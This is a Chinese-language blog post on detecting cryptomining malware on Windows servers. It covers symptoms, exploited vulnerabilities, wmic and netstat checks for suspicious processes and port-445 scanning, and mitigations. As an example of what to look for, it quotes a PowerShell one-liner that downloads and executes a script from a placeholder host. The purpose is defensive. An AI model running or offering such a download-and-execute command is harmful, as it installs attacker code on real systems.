Windows 服务器挖矿病毒的判断方法
发布作者:微思网络 发布时间:2022-06-30 浏览量:0次
挖矿病毒的简单表征现象(出现以下现象,即应开始警惕) CPU占用率高 C盘可用空间骤降 服务器风扇开始全负载工作,具体现象就是巡检物理服务器的时候明显感觉"噪声变大"
挖矿病毒的工作方式及如何简单排查
新的挖矿病毒已经开始结合高级攻击技术,如利用"EternalBlue 永恒之蓝", Weblogic WLS 组件漏洞、Strusts2 远程命令执行,Jboss 反序列化漏洞等等进入系统;
当病毒通过漏洞进入系统后,通常会使用 cmd 、powershell 命令执行从远端下载"挖矿脚本"(也有部分直接就自带挖矿程序,直接利用漏洞执行)
可以在服务器的 cmd 窗口下执行以下命令查找所有进程,该命令将会把所有进程信息生成到 tasklist.txt 文本文件内,以便分析:
C:\Users\Administrator> wmic process get caption,commandline /value >> tasklist.tx
在文本文件中着重查看 CommandLine= 后面带有 "http" 链接的进程,如:
CommandLine=cmd.exe /c "powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx'
目前新型的勒索/挖矿病毒都会利用 445 端口进行横向传播,具体现象即: 服务器会向大量其他IP地址的445端口发送请求; 可使用 netstat 命令进行检查:
"进程ID号为 10864 的进程,正在尝试访问 10.11.70-76 这几台主机的 445 端口" 防范手段 1. 巡检机房时,多注意下是否有服务器在空闲时段出现"风扇满载"的现象 2. 对重要业务服务器,部署监控系统,如 zabbix,方便随时查看服务器CPU、磁盘等负载,并且设置阈值告警,触发则提示运维人员 3. 使用组策略中的"IP策略"将 TCP/UDP 的 445,135-139 端口进行封堵(注意: 封堵 445 后,文件共享服务无法使用,域控也无法正常工作; 最佳做法是:打补丁) 4. 服务器可以部署付费的杀毒软件,如 NOD32 企业版、火绒企业版、360企业版等,这些企业版杀毒软件均支持离线更新病毒库C:\Users\Administrator> netstat -ano | find "SYN"
TCP 192.168.3.91:6735 10.1.1.70:445 SYN_SENT 10864
TCP 192.168.3.91:6736 10.1.1.71:445 SYN_SENT 10864
TCP 192.168.3.91:6745 10.1.1.72:445 SYN_SENT 10864
TCP 192.168.3.91:6746 10.1.1.73:445 SYN_SENT 10864
TCP 192.168.3.91:6755 10.1.1.74:445 SYN_SENT 10864
TCP 192.168.3.91:6756 10.1.1.75:445 SYN_SENT 10864
TCP 192.168.3.91:6765 10.1.1.76:445 SYN_SENT 1086
